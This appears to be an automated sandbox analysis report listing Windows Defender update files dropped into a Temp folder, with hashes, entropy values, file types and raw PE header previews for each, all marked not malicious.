SSDEEP:	6144:mmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJ3:8X
MD5:	A53F055CB974301DB1AC40C0EB06892F
SHA1:	CC9707F2E90FB8B29F89BA42CB04C96BEFCB80EE
SHA-256:	5DD0D99DD459E9F5463910EE621ED599A063B8DD87A05F5B74E14183E3ABD1C8
SHA-512:	C173182E1C139B5A671B11709FC9930630F1CBC8ECE19DEAB19EF45A22AFA4F6DB93BBE07D363FB1A832A3EDFAD598B9EC3976B90D75C2CD9698AE38818A2DA1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....z1............!.................................................................0....@.......................................... ...................%..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....z1.........l...P...P........z1.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..P....rsrc$01....P#..8....rsrc$02.... ....~{l.G.L...\|.8......<$.-..B..z1.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpClient.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	924408
Entropy (8bit):	6.69385313561795
Encrypted:	false
SSDEEP:	24576:6g1aON+lSaOlo+vTz6XqiddC50bcNHBRAN4JCLIKLI:v1aON+I56MoqiTC50bcN3KLI
MD5:	4F5A95F42A02C730C6E7B20FB11FA212
SHA1:	F5A8D044892ED7E2081080E202A5E1B29D7A12DD
SHA-256:	8AE4436E7E542D34989EDF57D04F7311058C8F7D04C23209A3570AC36709626A
SHA-512:	3C89A8A4A4613F90C806ACA0F976092DD17886A973A0C185E2ED28BDF45524159680723B50565F7045C2CC4BBC18FBF43D238724B727988F493501B5311AB474
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.i...M..M..Ma..L$..Ma..L9..M#..M=..M..M...Ma..L...Ma..M(..Ma..L+..Ma..L...M.:yM+..Ma..L?..Ma..M+..Ma..L+..MRich..M................PE..L....U.p...........!.........p....................[.........................0......._....@A...........................l...@%..T....`...................$...p..L.......T...................49..........@............ ..8............................text...<........................... ..`.data....z.......p..................@....idata...$... ...&..................@..@.didat..T....P.......(..............@....rsrc........`.....................@..@.reloc..L....p.......6..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpCmdRun.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	767960
Entropy (8bit):	6.364570090020735
Encrypted:	false
SSDEEP:	12288:hU8OQ5M11oZ1kCKhGqocBMIBtM8zymghLyZ9B8xWuux/H8Uz3VFzvHs:bOQ5M1CZ1kCKhGqo2Md8zxgtCnzlTfzv
MD5:	49E4F89739C96453B56309AA46C51955
SHA1:	28827A807DD96CFF033A4D117382A58E5C9C1343
SHA-256:	C65DB4F565555E16AEDB6342449A8A7E1FA76F73D6C76705AC82292F600523C9
SHA-512:	D6FA7E173D35E84FDE1997283FD2EED810C35CBE49D89DA1085C9538649C74A669AC170FE717C2304E28B7A5D860F2AF4B0C378558772132915A7FCF5133EAC3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..\|s.z/s.z/s.z/8.y.b.z/z../e.z/8...@.z/8.{.`.z/s.{/ .z/8.s...z/T../q.z/8.~.d.z/8../r.z/8.x.r.z/Richs.z/........PE..L....@..............................pt............@.................................N5........... ..........................P&.......`...............x...?...0.....\...T....................'..........@............ ..H...X... ....................text............................... ..`.data....A.......8..................@....idata...,... ......................@..@.didat.......P.......(..............@....rsrc........`.......*..............@..@.reloc......0......................@..B................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpCopyAccelerator.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	131632
Entropy (8bit):	5.803250746849389
Encrypted:	false
SSDEEP:	1536:RlUaTuA66sDelW1G7dxbyYtt7PeLmx5GbG43DlQt9bfFPPDozi:RlUaTuA0ZGmYtt70mx8C4Tut9DFTou
MD5:	D73A9388AA6BBBAFDAAA1C159D73ABBB
SHA1:	DFBEAAE83F4989299C302DF332A4C6682334E879
SHA-256:	C857754B9000E280A1F0549EE6F99BDDBFBC74BEF28E5C389619B312E9976638
SHA-512:	F322E3B51CA6D0FDE3AFAF9152A5F0EB030532954C0FA92B54F9D7E0F3B3ABC5FADA3A24E53D076AB543305F37CA61BF26DF117611FA2BDB0E8D257B295AE10F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u....X...X...X...Y...X..X...X...Y...X...Y...X...X...X...Y..X...Y...X...X...X...Y...XRich...X........PE..L....>%.............................0.............@.................................I............ ...........................".......@..................0*......P..../..T............................................ ..x............................text............................... ..`.data...............................@....idata..~.... ......................@..@.rsrc........@......................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpDetours.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	110864
Entropy (8bit):	6.678237799390915
Encrypted:	false
SSDEEP:	1536:PwV0QY9fx6gixjG8/648spxJiB3nGe+qcSDJkYcKIPOBw7r5bbGyPeFzu:46QmfaxjfdJir+qLJaqw7VvYy
MD5:	1F81F31C4155CBC3C9B6E973FDE74726
SHA1:	0530EC1A5B370A07797808F6A3CEE61B402F23CB
SHA-256:	2785973CF45A7279FB0A70C4D8820E4B25D76E56B47291BD551577AD2D4E5424
SHA-512:	0552E881A418E8E6F8B0782E80DA4B9BB6EDB956A696B263EB55ADCAC90FCAA4B8F927B11F1B304D6CC0E27F63751A182C333B84338C1D38A50BFFE443E5FB16
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........zV.;.8.;.8.;.8.pc9.+.8.pc;.0.8.2c..4.8.;.9...8.pc=...8.pc8.:.8.pc1.r.8.pc<.4.8.pc.:.8.pc:.:.8.Rich;.8.........PE..L..................!.....N...B......P........`............................................@A.........................Z......Tr...........................%...........6..T....................!..........@............p..L............................text....L.......N.................. ..`.data........`.......R..............@....idata.......p.......Z..............@..@.rsrc................l..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpDetoursCopyAccelerator.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63224
Entropy (8bit):	6.637024853514793
Encrypted:	false
SSDEEP:	768:m5OXGyXe3YVCRMIt8QUgboEnlJjWRqxpgbkwSOTPEJZ+nEObWO21PlxLVNe9ze:0OPeIVCreco+HqKFckZRObWOOPlnNaze
MD5:	2C686AE55DDE8A6FBB9C2CFBBE0366E7
SHA1:	9E0B18125948CC2DD99C619A52E11445C217FEA5
SHA-256:	9AB2B3852D2ADC0D4CD148C61DA757777D7772007A4C0882AF943B6C38D1A528
SHA-512:	A36A5A88CC57AE24BBD02244C3B25DB6C9E9798A56EBE9A2E7ED94CABF1A49F8DF3ADA9041997F8044AE0EABF7878C35871845DB4F706D8390BA6E6275241394
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.G.!.).!.).!.).j.(.+.).j...).(.....).!.(.-.).j.,...).j.). .).j. ...).j.-.1.).j.. .).j.+. .).Rich!.).................PE..L...\>L............!................0v....................................................@A........................ ...E...............X................$...........-..T...................X!..........@............................................text...e........................... ..`.data...............................@....idata..>...........................@..@.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MpOAV.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	434936
Entropy (8bit):	6.225198002756503
Encrypted:	false
SSDEEP:	6144:uB0WywehpP8NGHGpAvW76F+uPLkWWmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVD:u6Qehp7mAvjIuPLyyQ0
MD5:	212E7E8691A415C613675662276D147D
SHA1:	A68D32FE13C33049611E1DABA388F2684FD67676
SHA-256:	43D56E38412C928F079DD134E7571DBE8055B70138AC29D6C986B31E3DBFC523
SHA-512:	1754CDD3ECEE2F09C560EF2CBAB32841147DA91BF3FC038D8A984A1267086024737BB8DB85477B754AF4CA165967467DD78E14B0E4E05AD1173F9BDA16E78D20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Nsu./.&./.&./.&.W.'./.&./.&...&.W.'./.&.W.'U/.&.W.'./.&.W.'./.&.W.'./.&.W.&./.&.W.'./.&Rich./.&................PE..L....1.-...........!.....B...F.......W.......`....._................................Cq....@A........................pO..........x....................~...$......H(......T....................%..........@............................................text....@.......B.................. ..`.data...X#...`.......F..............@....idata...............\..............@..@.rsrc................h..............@..@.reloc..H(.......*...T..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\MsMpLics.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13560
Entropy (8bit):	6.68347784132251
Encrypted:	false
SSDEEP:	192:F8HcJWg3HWMALc2Fu462TNpRpSDBQABJAviK2YdX01k9z3AcXvxIe1:VJWg3HWM1MJCDBRJAkwR9z5vxn1
MD5:	97E6C0501C571F7A84E9E61EEB4BE175
SHA1:	C737D00A9F4514484D45E152A49A80822D1E534D
SHA-256:	BF96934B1C40EEC6148EF306ED4D0271CEE271DC6DA90E76030409A72645CB1C
SHA-512:	7AFAC3DBEA7694B6777EE54E8083C1FBDACD4CE9780F328ACFB87D377D004F5A565C58A96416BC9F0F5D01BCA0D0E10A5135529A8B7ED33018ADC9CEA5935F5D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....1.W...........!.........................................................0............@.......................................... ...................$..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....1.W........l...P...P........1.W........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..0....rsrc$01....0!..`....rsrc$02.... ....Dd....<Of......s...eZ...I/H.1.W........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\en-US\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60664
Entropy (8bit):	4.379981311852695
Encrypted:	false
SSDEEP:	768:KiJbyt33vY7EhrdTXn147vXahEzhEthEGQRQwhEHBe91PKM9zxsGO:/JbytHi6rdW7vM+4IoerPxzxY
MD5:	5F5E8B930067E25D692B742D9AD21175
SHA1:	D877EEE9AE8FFE7AA053113E410D7B2D1887FF23
SHA-256:	1F59C76DB3339C778491D925ED154C2461F4C8846919BECAC3A261CDFA8AB8EE
SHA-512:	25A0119A6E060576AA64F35067787D2A5CD20C2F6A6E41A4E833CFAA29D3A1754C5FAC3C37A908B5AA2D59BB61DD420C67D9C272D7F93E6EAA8AB70E5F6A3D5B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................l.....@.......................................... ...................$..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\x86\endpointdlp.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	544016
Entropy (8bit):	6.56071420762511
Encrypted:	false
SSDEEP:	12288:xBNNA8niM1mFnOAmr5ZkGFD4u7cXFa+/8Mx:rNNA8iG7r5ZkmDuTx
MD5:	1D8A4F5FC9C4B8FBC58A6A6B7B9A8F42
SHA1:	CDDDAF1C350914B05D26582015944241D918EB6C
SHA-256:	8FB1A93BE4B3AC15ABDCC6C86FE8A174BF71CB1A5E2A00CAA4F90F4A9312F579
SHA-512:	C77A8745E7B1E12054A77B210022F24DF7DFA4255DB399A910C90F42CCC15BC8745C550A547B8623BD6178E52C64A91E7ACE6E97595FDD2DC02DB7EE92EAEA2F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w...........n...........n.....n.q...n(.....n.....n.'...n.....n*.....n....Rich...........PE..L....Q.............!.................%..............................................".....@A................................x........ ..(............(...%...0...J..P...T...................`1..........@...............p............................text.............................. ..`.data....1..........................@....idata..L...........................@..@.rsrc...(.... ......................@..@.reloc...J...0...L..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-CN\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	6.722054620771532
Encrypted:	false
SSDEEP:	768:lXEX/1LZrJe18HL3eIb4XKWUv/dUZT/4pez1PZ3l9zuAdj:5E/1V/lb4aWzT/4pe5PZHzuA9
MD5:	27F701239E084F7B25C718C8FD59FC8B
SHA1:	F0E369F935B071D8F9556F227A579420C0A9F1A8
SHA-256:	F035303BF9369F94B8596279E773F8CB1743B3F9AAB97F32405DDD92E296D597
SHA-512:	8C521CAC53E6615356D8BFF235227EB69D86A88012DE85D1E5DE5516FF727A393A68E1E662F9342E4223C2CB54CE3CA7983D367D1CE0B0424737FB319CDD6E66
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........T............................................................@.......................................... ...Q...........V...%..............8............................................................................rdata..............................@..@.rsrc....`... ...R..................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-CN\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33544
Entropy (8bit):	6.057030297367959
Encrypted:	false
SSDEEP:	384:xAGBGjW0xjBcIkwYwJ/KEPWHBW5uDBRJQleLR9zusk2Iz:xajkwYwJ/KEQQu1PSed9zuzz
MD5:	654D74458EDB898E8990FEF82549E52D
SHA1:	AD0EB293F9CA5D4C42E8EACA657DA663E355B8F7
SHA-256:	3789695083D980CE34A4C7CAE842905C090F00485DD425EC080E1E82AD10CAC6
SHA-512:	B3DF36DD7D74288A9A830C729DC1D89BD4631A5FAA5CB9DFE9F1F0A7624004FB1075B0B9F998FC03CEB164A0715ECB9E6C2F9294519188A1C4FE663FFB288BAE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........\............................................................@.......................................... ...X...........^...%..............8............................................................................rdata..............................@..@.rsrc....`... ...Z..................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-CN\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56072
Entropy (8bit):	4.815166682714543
Encrypted:	false
SSDEEP:	768:1ZJ7N5BdTca+zUia/XPJVpbD/BVEOXvQwn81PWMufiC9zuudy:bJ7NPFS+XPRdXDcPWVzun
MD5:	33CCC7693C918CB89D384B40F1875BFF
SHA1:	22C6498A532533FB8A2E9DFDC184A652F09D96E4
SHA-256:	175EFC78C1F20DF33D00D9A22979F7B4C5C63A82D273908D6FC3D763202CA8DD
SHA-512:	102B8BEC7FE314951675F05CCEF1DA9E6488D91EEA129F7A0D3E072C6BBF54AFD9C27F15DE965F634B99229A46370DD3A8736EF0A34712942C8B6C9876A19252
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................w....@.......................................... ..t................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-CN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19208
Entropy (8bit):	6.870242710309067
Encrypted:	false
SSDEEP:	384:Ptfss66mQVWSa/WFDBRJ8pUad+JR9zusNKhO3:tss66mQg41Ppadk9zujhO3
MD5:	46C8CBE8B6F842691E563C3E759666B0
SHA1:	8D6F6CFD667BB4C899F143245288065D36527509
SHA-256:	5D3F078B56818B656964F4CA45A02A39922AE0D11B1BA095D6AD414F76E7DF93
SHA-512:	A2309FC4F82486AE2F844640F138F5799F74B585F40B284B0220F4A14474FBB010D22215ECDC92E156E9B316F81471413FB3423DE041C241DCC3250B252DC71E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........$...............................................P............@.......................................... ... ...........&...%...........................................................................................rdata..............................@..@.rsrc.... ... ..."..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-TW\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32000
Entropy (8bit):	6.785324586825093
Encrypted:	false
SSDEEP:	384:6sWoFniYX+jOe2Dr+8I4LquLXyAC4lWuQWdDBRJ0cpZ3X+R9z/5u2:TWotHY2+iXyenj1P1Xi9zE2
MD5:	2AFBD7D2824BB9DE6D84C48DD97C978F
SHA1:	B011D6E9AEF1001AAA90A72486433C9953B65A60
SHA-256:	9D44017A29D4A6FCCAA1979411B5669A328266C403FF3745BCD5437C4CA13CCD
SHA-512:	0A0844DB20D707D5F1CFD1381419448B8E7FF8707C9A179474F8FB5E08AD8B976953555D8AB8B70CCC0A366AFDE87B0810F2AD02C59ABC693848AFE1228A8AF7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........V.......................................................b....@.......................................... ...S...........X...%..............8............................................................................rdata..............................@..@.rsrc....`... ...T..................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-TW\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34056
Entropy (8bit):	6.126348709863497
Encrypted:	false
SSDEEP:	384:sCJLCupmD5b4o0NyRjNfK2FswAhWQBWxDBRJRe99R9zus1ut2:sYLDpmD5b4ANNC2FswANG1PY9/9zuD2
MD5:	681D22F59481AFB8390E9560E7DDCD51
SHA1:	33FB8D8012E2D5FC47E87AAAD27A9127B35E8A82
SHA-256:	EF1A33569B7F72B637D839DE48179C34AB2CF89A171321703725267E438622F5
SHA-512:	05524739FDFD2653F018689ADEB8DD510A3E81A908AE2BFE64798CA1886BDEA9AEA5659E83E7A8CDE22DE47D5C8BD3FCEDFED9FA14728A9E4BA508FD068F2D99
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........^......................................................!.....@.......................................... ...[...........`...%..............8............................................................................rdata..............................@..@.rsrc....`... ...\..................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-TW\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56072
Entropy (8bit):	4.828517520404138
Encrypted:	false
SSDEEP:	768:bxOBFGhlwr5zUezTKXdXDpb4ziQHXVQ5UiRe5D1PPmy3l9zuAn:bwBAhAzWXdKzbXIe5JPP5HzuAn
MD5:	46AD31AD62A26D9D24B557A41D8C3EA5
SHA1:	1D2F93A92AD5F3A5696B89541BDBBEC3702E2452
SHA-256:	744F29A2DBBA532E182769FB6F9C7FB921B1F4C9C005E6AE5599B7374A3F68FB
SHA-512:	2D07C5F0A337DDA2AD904471C9211604AFEF2AC60260FEB7B177C53CFDA0624F1A7EB20DE19605D98FBD9D81EAE92FFF4ADAA0F5789B6627DDAE32BEEC41C0EA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\zh-TW\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19200
Entropy (8bit):	6.874268464272377
Encrypted:	false
SSDEEP:	192:v2IDD4eundmyI6DKPI3+j7Iz3eDHWSa/WsaRpSDBQABJgcZTTbbrmjX01k9z3Ael:v20DDK+gAHWSa/WuDBRJgcZ3X+R9z/5r
MD5:	E53ED9FBAC95E9776367B25996F8D5F3
SHA1:	66A3A675A921DA42D652DA842AF89F720DCAFE37
SHA-256:	36726E24D97A0162F8C76CD5A7BC722C51542D4822959ED5659C4BDF9A0BBC78
SHA-512:	3630B3B3B4CB16A498F2F266C33B2BDE5C779BC0B75A36E3CCF474695036C19A562664E655A15A0AAB0035086FE24FD9E0F9BEAAA6B726DE0287D64032F04FA0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........$...............................................P.......5....@.......................................... ..8!...........&...%...........................................................................................rdata..............................@..@.rsrc...8!... ..."..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..X....rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	81004
Entropy (8bit):	3.216240338889032
Encrypted:	false
SSDEEP:	768:vy0IgLBJkRaFlA0HpZHMOp6Uyv801U187l+yh6EP6f5fNVK5Mh2D:K0IgLxfZHp5PdKK2V6zVK5Mq
MD5:	F7BD9AEA21B50BAC99B44BC84BFE3635
SHA1:	147834A15844A0A1FE75A56650647C2A3DF271DC
SHA-256:	DFF5EE05BD437A66D527C4C98B23D560BF35A250F6B9284909AF267B506C9C3F
SHA-512:	43143C54BB718DAD679566EB7D6B9311981BCD3891F45DF943EE5000A061665AA5000A467103F6E4E8EEA1E2ADFCFD10A508C7E1B9E8E43012302F369F2A597A
Malicious:	false
Preview:	..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.2.-.0.5.-.2.6. .1.5.:.4.6.:.3.2.Z.....P.r.o.c.e.s.s.:. .6.7.8...1.d.8.7.1.1.7.c.5.f.2.9.c.9.3.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .1...3.6.7...5.0.2...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.e.4.2.8.c.3.f.6...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.u.s.

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
